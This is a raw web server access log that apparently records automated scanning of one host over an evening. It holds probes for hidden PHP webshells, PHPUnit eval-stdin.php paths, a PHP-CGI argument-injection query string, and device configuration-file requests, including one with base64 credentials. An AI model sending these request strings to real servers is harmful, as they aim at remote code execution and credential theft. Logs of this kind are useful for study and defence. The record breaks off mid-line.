"//wp-content/plugins/achdxhv/languages/admin.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:43 +0000] 404 - GET http profibot.direct.quickconnect.to "//user.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/block-patterns/" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:44 +0000] 404 - GET http profibot.direct.quickconnect.to "//index/function.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/rip.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp4.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:45 +0000] 404 - GET http profibot.direct.quickconnect.to "//403.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:45 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-admin/maint/index.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/asd67.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:46 +0000] 404 - GET http profibot.direct.quickconnect.to "//sad/about.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:46 +0000] 404 - GET http profibot.direct.quickconnect.to "/oivcl.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:46 +0000] 404 - GET http profibot.direct.quickconnect.to "//about.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:46 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/themes/deeto/login.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:47 +0000] 404 - GET http profibot.direct.quickconnect.to "/v2.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:47 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:17:09:47 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/themes/hideo/network.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:47 +0000] 404 - GET http profibot.direct.quickconnect.to "/x/" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:48 +0000] 404 - GET http profibot.direct.quickconnect.to "//.cache/x.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:48 +0000] 404 - GET http profibot.direct.quickconnect.to "/dr.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/raw.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:49 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-includes/css/about.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:49 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/index.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/ioxi-o2.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/dropdown.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/dlu.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:50 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/about.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/db.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/packed.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-configs.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:51 +0000] 404 - GET http profibot.direct.quickconnect.to "//404.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/des.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/.well-known/content.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:09:52 +0000] 404 - GET http profibot.direct.quickconnect.to "//lufix.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:17:19:09 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:17:22:12 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:17:26:58 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:17:38:44 +0000] 200 - GET http 78.131.122.113 "/" [Client 176.65.139.8] [Length 1033] [Gzip -] "Hello World" "-" +[01/Feb/2026:17:38:47 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:17:42:20 +0000] 400 - - http localhost "-" [Client 194.165.16.167] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:17:49:30 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:17:49:58 +0000] 200 - GET http 78.131.122.113 "/" [Client 54.145.225.58] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[01/Feb/2026:17:52:20 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:17:53:10 +0000] 404 - GET http 78.131.122.113 "/actuator/gateway/routes" [Client 79.124.40.174] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:17:55:47 +0000] 404 - GET http 78.131.122.113 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:18:03:42 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.69] [Length 1033] [Gzip -] "-" "-" +[01/Feb/2026:18:10:09 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:18:11:57 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:18:15:32 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:18:18:29 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:18:33:17 +0000] 200 - GET http 78.131.122.113 "/" [Client 172.215.145.207] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[01/Feb/2026:18:34:33 +0000] 405 - POST http 78.131.122.113 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[01/Feb/2026:18:41:39 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:18:43:52 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:18:46:21 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:18:54:56 +0000] 200 - GET http 78.131.122.113 "/" [Client 146.19.24.133] [Length 1033] [Gzip -] "python-requests/2.31.0" "-" +[01/Feb/2026:18:59:24 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:19:04:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:19:07:59 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:19:09:31 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:19:10:03 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:19:14:52 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:19:15:34 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 79.124.40.174] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:19:33:22 +0000] 405 - POST http 78.131.122.113 "/" [Client 79.124.40.174] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:19:34:51 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:19:39:16 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:19:47:33 +0000] 404 - GET http 78.131.122.113 "/developmentserver/metadatauploader" [Client 20.65.193.78] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[01/Feb/2026:19:47:51 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:19:48:03 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:19:48:13 +0000] 404 - GET http 78.131.122.113 "/cgi/conf.bin" [Client 194.50.16.253] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11" "http://78.131.122.113:80/mainFrame.htm" +[01/Feb/2026:20:02:46 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:20:03:02 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:20:07:14 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:20:11:05 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:20:15:47 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:20:26:38 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:20:31:19 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:20:46:20 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:20:47:55 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:20:51:20 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:20:57:53 +0000] 405 - POST http 78.131.122.113 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[01/Feb/2026:20:59:30 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:21:10:17 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:21:11:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 46.101.137.171] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:21:11:18 +0000] 200 - GET http 78.131.122.113 "/" [Client 46.101.137.171] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" "-" +[01/Feb/2026:21:14:05 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:21:15:39 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:21:21:03 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:21:23:27 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:21:31:36 +0000] 404 - GET http 78.131.122.113 "/System/configurationFile?auth=YWRtaW46MTEK" [Client 77.110.118.231] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:21:33:58 +0000] 400 - GET http localhost "/" [Client 80.82.70.133] [Length 252] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.81 Mobile/15E148 Safari/605.1" "-" +[01/Feb/2026:21:34:41 +0000] 400 - GET http 78.131.122.113 "/" [Client 80.82.77.202] [Length 252] [Gzip -] "fasthttp" "-" +[01/Feb/2026:21:34:41 +0000] 400 - GET http 78.131.122.113 "/aaa9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[01/Feb/2026:21:34:41 +0000] 400 - GET http 78.131.122.113 "/aab9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[01/Feb/2026:21:34:54 +0000] 400 - GET http 78.131.122.113 "/aaa9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[01/Feb/2026:21:34:54 +0000] 400 - GET http 78.131.122.113 "/aab9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[01/Feb/2026:21:36:50 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:21:42:01 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:21:48:45 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:21:49:17 +0000] 200 - GET http 78.131.122.113 "/" [Client 87.121.84.51] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[01/Feb/2026:21:50:16 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.185.132.165] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:21:50:16 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.185.132.165] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:22:01:52 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 95.181.174.249] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:22:01:55 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 95.181.174.249] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:22:01:58 +0000] 404 - POST http 78.131.122.113 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:01:58 +0000] 405 - POST http 78.131.122.113 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 95.181.174.249] [Length 154] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:01:58 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:01:58 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:01:59 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:01:59 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:01:59 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:01:59 +0000] 404 - GET http 78.131.122.113 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:01:59 +0000] 404 - GET http 78.131.122.113 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:01:59 +0000] 404 - GET http 78.131.122.113 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:01:59 +0000] 404 - GET http 78.131.122.113 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:01:59 +0000] 404 - GET http 78.131.122.113 "/phpunit/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:01:59 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:01:59 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:00 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:00 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:00 +0000] 404 - GET http 78.131.122.113 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:00 +0000] 404 - GET http 78.131.122.113 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:00 +0000] 404 - GET http 78.131.122.113 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:00 +0000] 404 - GET http 78.131.122.113 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:00 +0000] 404 - GET http 78.131.122.113 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:01 +0000] 404 - GET http 78.131.122.113 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:01 +0000] 404 - GET http 78.131.122.113 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:01 +0000] 404 - GET http 78.131.122.113 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:01 +0000] 404 - GET http 78.131.122.113 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:01 +0000] 404 - GET http 78.131.122.113 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:01 +0000] 404 - GET http 78.131.122.113 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:01 +0000] 404 - GET http 78.131.122.113 